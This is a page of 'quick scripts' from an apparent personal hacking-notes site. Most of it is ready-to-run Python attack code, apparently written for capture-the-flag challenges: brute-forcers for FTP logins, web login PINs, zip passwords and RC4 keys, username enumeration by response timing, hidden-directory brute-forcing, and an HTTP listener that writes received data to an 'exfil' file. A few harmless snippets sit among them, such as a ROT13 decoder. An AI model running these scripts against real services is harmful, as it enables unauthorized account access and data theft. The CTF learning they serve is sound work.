πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
Hacking Notes
Search…
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
Hacking Notes
Hacking Notes
πŸ’…
One-Liners
βš”
Offensive
Exploit Workflow
Recon
Payloads
Websites
Password Attacks
Databases
Microsoft Windows Exploits
Social Engineering
Netcat & Socat
File Transfers
Metasploit
Priv Escalation
Pivoting
Certs and Secrets
Post Exploitation
NGROK
Misc.
πŸ›‘
Defensive
Defensive Notes
Windows Forensics
Linux Forensics
Network Forensics
Stego
Malware Analysis
Volatility
🌩
Cloud
Scope and Shared Responsibility
AWS CLI
Azure CLI
SaaS Attacks
PaaS
⌨
Programming
Programming Notes
Examples and Quick Scripts
Pwn
Python
C
PHP
Powered By GitBook
Examples and Quick Scripts
This is a page of quick wins and scripts written to achieve certain goals. Copy/paste parts as needed!

Python

FTP Brute Force

Brute forces all passwords from words.txt for the username secure_usertry/except loop.
1
from ftplib import FTP
2
import time
3
​
4
ftp = FTP()
5
HOST = 'services.ftp.site'
6
PORT = 2121
7
ftp.set_debuglevel(2)
8
​
9
​
10
dictionary = 'words.txt'
11
password = None
12
​
13
with open(dictionary, 'r') as f:
14
for line in f.readlines():
15
password = line.strip('\n')
16
print('trying ' + password)
17
time.sleep(0.001)
18
try:
19
ftp.connect(HOST, PORT)
20
ftp.login(user='secure_user', passwd=password)
21
ftp.quit()
22
except:
23
pass
24
print(password)
Copied!

RC4 Brute Force

ARC4 brute forcing script written to try and decrypt a string. The decryption attempt is passed to another loop to try and determine if the string is readable ASCII or not. I chose not to pause or quit the loop because I was getting some false positives.
1
from arc4 import ARC4
2
​
3
cipher = b'\x55\x34\xe1\xb2\x17\xdc\x2a\xc5\x21\x26\x77\xe3\xae\x56\xed\x42\xc3\x28\x10\x40\x0a\xfc\xa2\x1d\xef\xab\x11\x1b\xc7'
4
​
5
with open("big_set.txt", "r") as keys:
6
for line in keys:
7
line = line.strip()
8
arc4 = ARC4(bytes(line, 'utf-8'))
9
new = arc4.decrypt(cipher)
10
try:
11
decoder = bytes.fromhex(new.hex()).decode('utf-8')
12
print("Key " + line + " made this:\n" + decoder)
13
except UnicodeDecodeError:
14
pass
Copied!

Zip File Brute Force Guess with B64 Password

This script will attempt to unzip an archive with a password from rockyou. This particular challenge said the password was base64 encoded, which is what the first part of the loop is for. Second part of loop is a try/except loop to pass the unzip error with wrong password.
Alternatively, one could get the zip hash then convert the rockyou list into base64 for each line - I chose to NOT do this to prevent having an extra rockyou file full of base64.
1
import base64
2
import zipfile
3
​
4
dictionary = '/mnt/d/hashcat-6.0.0/rockyou.txt'
5
​
6
with open(dictionary, 'r', errors='ignore') as f:
7
for line in f.readlines():
8
password = line.strip('\n')
9
#print(f'Raw password is {password}')
10
encoded = base64.b64encode(str.encode(password))
11
#print(f'Encoded password is {encoded}')
12
​
13
with zipfile.ZipFile('./base64.zip','r') as zip_ref:
14
try:
15
zip_ref.extractall(pwd=encoded)
16
print(f'Found! Password is {password}, encoded is {encoded}!')
17
quit()
18
except:
19
pass
Copied!

Connect to a Website, Establish Session, and Send Data

Establishing a session prevents multiple TCP connections from having to be opened. Additionally, taking the JSON and interpreting natively makes things useful!
1
import requests
2
import json
3
url = 'https://captcha.lol'
4
​
5
header = {'User-Agent':'bot'}
6
s = requests.Session()
7
r = s.get(url,headers=header)
8
​
9
ans = json.loads(r.text)
10
​
11
code = ans['code']
12
nonce = ans['nonce']
13
print(code)
14
print(nonce)
15
p = s.post(url, json=ans, headers=header)
16
​
17
print(p.text)
Copied!

PIN Brute Force for Web Login

This script adds a pin guess for a web login attempt. The pin is zfilled which makes 4 to 004. Additionally there’s a regular expression to find if access was denied or not and give what the PIN was while breaking out of the loop. A final print statement lets me know that they were all looped through, useful when I wasn't sure if my requests were properly formatted.
1
import urllib
2
import requests
3
import re
4
​
5
url = "https://vuln.server/admin_login"
6
​
7
pin = 0
8
​
9
while pin < 1000:
10
#headers = {'Cookie' : 'PHPSESSID=qhq84atma883hio9eso7hhsr4j'}
11
payload = {'email':'[email protected]','password':str(pin).zfill(3)}
12
req = requests.post(url, data=payload, allow_redirects=True)
13
if not re.findall('Access Denied', req.text):
14
print(f'\npin is {str(pin).zfill(3)}!\n')
15
break
16
print(str(pin).zfill(3), req.status_code, len(req.content))
17
pin = pin + 1
18
​
19
print('finished testing')
Copied!

Username Guessing based on Timing Analysis

This script pays attention to the timing between good usernames and bad ones to help determine if a username is valid.
1
import requests
2
from string import ascii_lowercase
3
with open('surnames.txt') as f:
4
lines = f.read().splitlines()
5
for lname in lines:
6
for init in ascii_lowercase:
7
username = init+lname
8
r = requests.post('http://m4lwhere.org/login.php', data = {'user':username,'pass':'haha'})
9
roundtrip = r.elapsed.total_seconds()
10
print(f'{roundtrip} for {username}')
Copied!

Connect to Raw Socket and Pass Data

This challenge required connecting to the socket and brute forcing the first byte back, I didn’t fully finish this challenge because it was a little frustrating. I need to spend more time on this script.
1
import socket
2
3
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
4
s.connect(('cfta-ne01.allyourbases.co',8017))
5
buf = s.recv(1024)
6
s.recv(1024)
7
conv = buf.decode('unicode-escape').encode('latin1').decode('UTF-8')
8
conv = conv + '\n'
9
print(conv)
10
s.sendall(bytes(conv, encoding='UTF-8'))
11
ans = s.recv(1024)
12
win = ans.decode('unicode-escape').encode('latin1').decode('UTF-8')
13
print(win)
14
s.close()
Copied!
1
import socket
2
import time
3
​
4
def connect():
5
s.connect(('challenges.ctf.lol',3008))
6
​
7
def recv():
8
recv = s.recv(1024)
9
print(recv)
10
​
11
for i in range(ord('A'),ord('z')+1):
12
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
13
print(f'trying {chr(i)}')
14
s.connect(('challenges.ctf.lol',30468))
15
recv = s.recv(1024)
16
print(recv)
17
s.sendall(bytes(chr(i), encoding='utf8'))
18
recv = s.recv(1024)
19
print(recv)
20
s.close()
Copied!

ROT13 Automatic Decoder

Written by Jess! Automatically finds the decoded input using the enchant library. Searches for legitimate words in the English dictionary, very cool!
1
import enchant
2
d = enchant.Dict("en_US")
3
​
4
cipher=input("Enter Caesar Shift Cipher to Decode: ")
5
for n in range(26):
6
decode=""
7
wordfound=""
8
for x in range(0,len(cipher)):
9
if ord(cipher[x]) in range(97,123):
10
decode+=(chr(((ord(cipher[x])-96+n)%26)+97))
11
elif ord(cipher[x]) in range(65,91):
12
decode+=(chr(((ord(cipher[x])-64+n)%26)+65))
13
elif ord(cipher[x])==(32):
14
checkword=d.check(decode)
15
if checkword:
16
wordfound=("Found!")
17
decode+=cipher[x]
18
else:
19
decode+=cipher[x]
20
check=d.check(decode)
21
print((n+1),decode,wordfound)
Copied!

Choose Random Numbers

This program chooses some random integers and assigns them to a string. Nothing fancy.
1
import random
2
​
3
series = random.randint(1,3)
4
​
5
book = random.randint(1,6)
6
​
7
page = random.randint(1,300)
8
​
9
print(f'Series {series}, Book {book}, Page {page}\n\n')
Copied!

List of all Characters from aa to zz :

Quick way to create a list of all possible lowercase values
1
from string import ascii_lowercase
2
for a in ascii_lowercase:
3
for b in ascii_lowercase:
4
print(a+b)
Copied!
Below is brute forcing all lowercase characters to find a hidden web dir
1
import requests
2
from string import ascii_lowercase
3
​
4
url = 'http://m4lwhere.org/'
5
​
6
for a in ascii_lowercase:
7
for b in ascii_lowercase:
8
for c in ascii_lowercase:
9
#print(a+b+c)
10
fullUrl = url + a + b + c
11
r = requests.get(fullUrl)
12
if r.status_code != 404:
13
print(f'Code {r.status_code} for {fullUrl}')
14
else:
15
pass
Copied!
Same one, just with a progress bar!
1
import requests
2
from progress.bar import Bar
3
from string import ascii_lowercase
4
​
5
url = 'http://m4lwhere.org/'
6
​
7
with Bar('Brute Forcing...', max=26*26*26-1) as bar:
8
for a in ascii_lowercase:
9
for b in ascii_lowercase:
10
for c in ascii_lowercase:
11
#print(a+b+c)
12
fullUrl = url + a + b + c
13
r = requests.get(fullUrl)
14
if r.status_code != 404:
15
print(f'\nCode {r.status_code} for {fullUrl}')
16
else:
17
bar.next()
18
pass
Copied!

Receive POST in Python

This uses to receive large items sent via POST
1
PORT = 8000
2
​
3
from http.server import HTTPServer, BaseHTTPRequestHandler
4
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
5
​
6
def do_GET(self):
7
self.send_response(200)
8
self.end_headers()
9
self.wfile.write(b'Hello, world!')
10
11
def do_POST(self):
12
content_length = int(self.headers['Content-Length'])
13
body = self.rfile.read(content_length)
14
self.send_response(200)
15
self.end_headers()
16
decoded = body.decode('utf-8')
17
print('[+] Received: ')
18
print(decoded)
19
f = open('/tmp/exfil.txt', 'w')
20
f.write(decoded)
21
22
with HTTPServer(('localhost', PORT), SimpleHTTPRequestHandler) as httpd:
23
print("[+] Running Server at", PORT, "Saving Files in /tmp/exfil.txt" )
24
httpd.serve_forever()
25
​
26
#Run it: python3 post.py
Copied!
Programming - Previous
Programming Notes
Next - Programming
Pwn
Last modified 1mo ago
Copy link
Contents
Python
FTP Brute Force
RC4 Brute Force
Zip File Brute Force Guess with B64 Password
Connect to a Website, Establish Session, and Send Data
PIN Brute Force for Web Login
Username Guessing based on Timing Analysis
Connect to Raw Socket and Pass Data
ROT13 Automatic Decoder
Choose Random Numbers
List of all Characters from aa to zz :
Receive POST in Python